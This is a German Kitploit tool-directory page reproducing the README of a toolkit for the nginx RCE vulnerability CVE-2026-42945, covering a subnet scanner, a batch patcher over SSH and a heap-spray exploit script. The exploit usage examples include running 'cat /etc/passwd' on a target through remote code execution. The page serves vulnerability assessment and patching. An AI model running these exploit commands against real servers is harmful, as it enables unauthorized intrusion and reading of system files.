Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-42945-NGINX-Rift-Toolkit — CVE-2026-42945 - NGINX Rift Toolkit | Kitploit
Tools/GitHubGitHub/gagaltotal/cve-2026-42945-nginx-rift-toolkit
Vulnerability ScannersNetwork MappingExploitationConfiguration AuditingWeb SecurityPenetration Testing
GitHubgagaltotal/cve-2026-42945-nginx-rift-toolkit

CVE-2026-42945-NGINX-Rift-Toolkit

CVE-2026-42945 - NGINX Rift Toolkit

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigenWebseite
41vor 3 MonatenNoch nicht geprüft

CVE-2026-42945 Nginx Rift Schwachstellen-Toolkit

CVSS Score: 9.8 - Critical Python Version License

Umfassendes Toolkit zum Scannen, Patchen und Testen von CVE-2026-42945 – eine kritische RCE-Schwachstelle in nginx

Inhaltsverzeichnis

  • Übersicht
  • CVE-Details
  • Funktionen
  • Toolkit-Komponenten
  • Anforderungen
  • Installation
  • Verwendung
  • Workflow-Beispiele
  • Sicherheitshinweise
  • Fehlerbehebung
  • Mitwirken

Übersicht

Dieses Toolkit bietet umfassende Werkzeuge zum Scannen, Patchen und Testen von CVE-2026-42945, einer kritischen Remote-Code-Ausführungs-Schwachstelle in nginx, die Versionen vor 1.26.3 (Mainline) und 1.24.1 (Stable) betrifft.

Die Schwachstelle nutzt eine fehlerhafte HTTP/2-Header-Analyse aus, wenn ASLR mittels Heap-Spray-Techniken deaktiviert ist.

CVE-Details

Funktionen

  • Netzwerkscan – CIDR-Subnetz-Scan mit gleichzeitiger Host-Erkennung
  • Versionserkennung – Multi-Distro nginx-Versionsidentifikation über SSH
  • Automatisiertes Patchen – Batch-Patching verwundbarer Instanzen über Netzwerke hinweg
  • Exploitation-Tests – Überprüfung der Schwachstelle mit Heap-Spray-Techniken
  • Berichtserstellung – Berichte im HTML- und JSON-Format
  • Dry-Run-Modus – Vorschau der Änderungen vor der Anwendung
  • Multi-Authentifizierung – SSH-Schlüssel- und passwortbasierte Authentifizierung
  • Audit-Protokollierung – Detaillierte, mit Zeitstempel versehene Betriebsprotokolle

Toolkit-Komponenten

1. nginx_scanner.py – Schwachstellen-Scanner

Scannt ein Subnetz oder einen einzelnen Host, um verwundbare nginx-Installationen zu identifizieren.

Funktionen:

  • Unterstützung für CIDR-Subnetz-Scans
  • Gleichzeitige Host-Erkennung und Versionserkennung
  • SSH-basierte Remote-Versionsprüfung
  • Multi-Distro-Unterstützung (Ubuntu, Debian, CentOS, AlmaLinux, RHEL)
  • HTML- und JSON-Berichtserstellung
  • Anpassbare SSH-Ports und Authentifizierungsmethoden

2. nginx_patcher.py – Patch-Automatisierung

Patched automatisch verwundbare nginx-Instanzen auf die neueste sichere Version.

Funktionen:

  • Batch-Patching über Subnetzbereiche
  • Distributionsspezifische Patch-Befehle
  • Dry-Run-Modus zur Sicherheitsvalidierung
  • Angabe der Zielversion
  • Detaillierte Patch-Ausführungsprotokolle
  • Fortschrittsverfolgung und Berichterstattung

3. exploit.py – Remote-Code-Ausführungs-Exploit

Testet die Schwachstelle CVE-2026-42945 mittels Heap-Spray-Technik.

Funktionen:

  • Zielgerichtete nginx-Instanzen mit deaktiviertem ASLR
  • Heap-Spray-Pufferüberlauf-Ausnutzung
  • Mehrere Offset-Unterstützung für Zuverlässigkeit
  • Fähigkeit zur Remote-Befehlsausführung
  • Verbindungs-Timeout und Wiederholungsmechanismen
  • Detaillierte Ausführungsstatistiken

Unterstützte Distributionen

  • Ubuntu (alle Versionen mit nginx)
  • Debian (alle Versionen mit nginx)
  • CentOS 7+
  • AlmaLinux
  • RHEL (Red Hat Enterprise Linux)

Anforderungen

  • Python: 3.7 oder höher
  • Betriebssystem: Linux/Unix-Umgebung

Abhängigkeiten

root@kitploit:~
paramiko (>= 3.0.0) - SSH client library
rich (>= 13.0.0) - Terminal formatting and progress bars

Installation

Schritt 1: Klonen oder Herunterladen

root@kitploit:~
git clone https://github.com/gagaltotal/CVE-2026-42945-NGINX-Rift-Toolkit
cd CVE-2026-42945-NGINX-Rift-Toolkit

Schritt 2: Virtuelle Umgebung erstellen

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate

Schritt 3: Abhängigkeiten installieren

root@kitploit:~
pip install -r requirements.txt

Verwendung

Screen Capture

Scanner (nginx_scanner.py)

Basis-Subnetz-Scan

root@kitploit:~
python3 nginx_scanner.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa

Einzelner Host-Scan

root@kitploit:~
python3 nginx_scanner.py --subnet 192.168.1.10 --user root --key ~/.ssh/id_rsa

Passwortbasierte Authentifizierung

root@kitploit:~
python3 nginx_scanner.py --subnet 10.0.0.0/30 --user admin --password "password"

Benutzerdefinierter SSH-Port

root@kitploit:~
python3 nginx_scanner.py --subnet 192.168.1.0/24 --port 2222 --user root --key ~/.ssh/id_rsa

HTML-Bericht generieren

root@kitploit:~
python3 nginx_scanner.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa --output report.html

Scanner-Optionen

root@kitploit:~
--subnet SUBNET              Target subnet in CIDR format (required)
--user USER                  SSH username (default: root)
--password PASSWORD          SSH password
--key KEY_PATH              Path to SSH private key
--port PORT                 SSH port (default: 22)
--timeout TIMEOUT           Connection timeout in seconds (default: 5)
--output FILE               Output report file (HTML/JSON)
--workers WORKERS           Number of concurrent threads (default: 20)

Patcher (nginx_patcher.py)

Screen Capture

Basis-Patching

root@kitploit:~
python3 nginx_patcher.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa

Dry-Run (Vorschau ohne Anwendung)

root@kitploit:~
python3 nginx_patcher.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa --dry-run

Zielversion angeben

root@kitploit:~
python3 nginx_patcher.py --subnet 192.168.1.0/24 --target-version 1.26.3 --user root --key ~/.ssh/id_rsa

Benutzerdefinierter SSH-Port

root@kitploit:~
python3 nginx_patcher.py --subnet 10.0.0.0/30 --port 2222 --user admin --password "password"

Patcher-Optionen

root@kitploit:~
--subnet SUBNET              Target subnet in CIDR format (required)
--user USER                  SSH username (default: root)
--password PASSWORD          SSH password
--key KEY_PATH              Path to SSH private key
--port PORT                 SSH port (default: 22)
--timeout TIMEOUT           Connection timeout in seconds (default: 30)
--target-version VERSION    Nginx version to patch to (default: latest)
--dry-run                   Show what would be patched without executing
--workers WORKERS           Number of concurrent threads (default: 10)

Exploit (exploit.py)

Screen Capture

Einzelnes Ziel exploitieren

root@kitploit:~
python3 exploit.py --target 192.168.1.100 --port 80

Mit benutzerdefinierter Payload

root@kitploit:~
python3 exploit.py --target 192.168.1.100 --port 80 --command "cat /etc/passwd"

Mehrere Spray-Versuche

root@kitploit:~
python3 exploit.py --target 192.168.1.100 --port 80 --spray 50

Detaillierte Ausgabe

root@kitploit:~
python3 exploit.py --target 192.168.1.100 --port 80 --verbose

Exploit-Optionen

root@kitploit:~
--target HOST               Target host IP or domain (required)
--port PORT                 Target port (default: 80)
--command CMD               Command to execute
--spray NUM                 Number of heap spray attempts (default: 20)
--timeout TIMEOUT           Connection timeout in seconds (default: 5)
--tries NUM                 Number of exploitation attempts (default: 10)
--verbose                   Enable verbose output

Workflow-Beispiele

Szenario 1: Vollständige Sicherheitsbewertung

root@kitploit:~
# Schritt 1: Netzwerk nach verwundbaren Instanzen scannen
python3 nginx_scanner.py --subnet 10.0.0.0/24 --user admin --key ~/.ssh/key --output scan_results.html

# Schritt 2: Scan-Ergebnisse in scan_results.html überprüfen

# Schritt 3: Verwundbare Instanzen patchen
python3 nginx_patcher.py --subnet 10.0.0.0/24 --user admin --key ~/.ssh/key

# Schritt 4: Überprüfen, ob Patches angewendet wurden, indem der Scanner erneut ausgeführt wird
python3 nginx_scanner.py --subnet 10.0.0.0/24 --user admin --key ~/.ssh/key

Szenario 2: Notfall-Patching

root@kitploit:~
# Schritt 1: Dry-Run, um zu sehen, was gepatched würde
python3 nginx_patcher.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa --dry-run

# Schritt 2: Patches anwenden
python3 nginx_patcher.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa

Szenario 3: Testen auf einem verwundbaren System

root@kitploit:~
# Schritt 1: Zunächst überprüfen, ob das System verwundbar ist
python3 exploit.py --target 10.0.0.50 --port 80 --verbose

# Schritt 2: Bei Erfolg wird sofortiges Patchen empfohlen
python3 nginx_patcher.py --subnet 10.0.0.50 --user root --key ~/.ssh/id_rsa

Sicherheitshinweise

Authentifizierungsmethoden

SSH-Schlüsselbasiert (empfohlen)

root@kitploit:~
python3 nginx_scanner.py --subnet 10.0.0.0/24 --user root --key ~/.ssh/id_rsa

Passwortbasiert

root@kitploit:~
python3 nginx_scanner.py --subnet 10.0.0.0/24 --user root --password "password"

Benutzerdefinierter SSH-Port

root@kitploit:~
python3 nginx_scanner.py --subnet 10.0.0.0/24 --user root --key ~/.ssh/id_rsa --port 2222

Fehlerbehebung

SSH-Verbindungsprobleme

  • SSH-Schlüsselberechtigungen: chmod 600 ~/.ssh/id_rsa
  • SSH-Dienst: Überprüfen, ob der SSH-Dienst auf dem Ziel läuft
  • SSH-Port: Überprüfen, ob der SSH-Port korrekt ist (Standard: 22)
  • Firewall: Sicherstellen, dass die Firewall SSH-Verbindungen zulässt

Versionserkennung schlägt fehl

  • Nginx installiert: Bestätigen, dass nginx auf dem Ziel installiert ist
  • Berechtigungen: Überprüfen, ob der Benutzer sudo-Rechte oder direkten Root-Zugriff hat
  • Netzwerk: Netzwerkkonnektivität zu den Zielhosts prüfen

Patching-Fehler

  • Dry-Run-Test: Verwenden Sie --dry-run, um Probleme ohne Anwendung zu identifizieren
  • Internet: Sicherstellen, dass die Zielsysteme für Paketdownloads über Internetverbindung verfügen
  • Paketmanager: Überprüfen, ob der Paketmanager auf den Zielen funktioniert
  • Speicherplatz: Festplattenspeicher auf den Zielsystemen prüfen

Ausgabeberichte

Der Scanner erstellt detaillierte Berichte in mehreren Formaten:

FormatBeschreibung
HTML-BerichtIm Browser anzeigbar mit Schwachstellenzusammenfassung, betroffenen Hosts, Versionsdetails
JSON-BerichtMaschinenlesbares Format mit vollständigen technischen Details
KonsolenausgabeEchtzeit-Fortschritt mit farbcodierten Ergebnissen

Protokollierung

Alle Vorgänge werden mit Zeitstempeln für die Audit-Compliance protokolliert. Überprüfen Sie die Konsolenausgabe für detaillierte Ausführungsinformationen.

Mitwirken

Beiträge sind willkommen! Um einen Beitrag zu leisten:

  1. Repository forken
  2. Einen Feature-Branch erstellen (git checkout -b feature/verbesserung)
  3. Ihre Änderungen committen (git commit -am 'Verbesserung hinzugefügt')
  4. In den Branch pushen (git push origin feature/verbesserung)
  5. Einen Pull-Request öffnen

Haftungsausschluss

Dieses Toolkit wird nur für autorisierte Sicherheitstests und Schwachstellenbewertungen bereitgestellt. Unautorisierter Zugriff auf Computersysteme ist illegal. Die Nutzer sind dafür verantwortlich, sicherzustellen, dass sie vor der Verwendung dieses Toolkits über die entsprechende Autorisierung verfügen.

Autor

gagaltotal – GitHub

Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die LICENSE-Datei für Details.


Zuletzt aktualisiert: 2026-05-20

Tool herunterladen
EigenschaftWert
Schwachstellen-IDCVE-2026-42945
TypRemote Code Execution (RCE)
CVSS-Wert9.8 (Kritisch)
Betroffene Versionen< 1.26.3 (Mainline) / < 1.24.1 (Stable)
Behobene Version1.26.3+
AngriffsvektorFehlerhafte HTTP/2-Header-Analyse
VoraussetzungASLR auf dem Zielsystem deaktiviert
ÜberlegungDetails
SSH-SchlüsselverwaltungSSH-Schlüssel sicher aufbewahren, niemals in Repositorys committen
NetzwerkzugriffFür den Produktionseinsatz eine ordnungsgemäße Netzwerksegmentierung sicherstellen
TestumgebungZuerst immer in einer Nicht-Produktionsumgebung testen
ProtokollierungAlle Vorgänge erzeugen detaillierte Protokolle für die Prüfpfadnachverfolgung
ASLR-StatusDas Exploit-Tool erfordert, dass ASLR auf dem Ziel deaktiviert ist
Dry-Run-ModusVerwenden Sie das --dry-run-Flag, um Änderungen vor der Anwendung in der Vorschau anzuzeigen
BackupErstellen Sie immer ein Backup der nginx-Konfiguration vor dem Patchen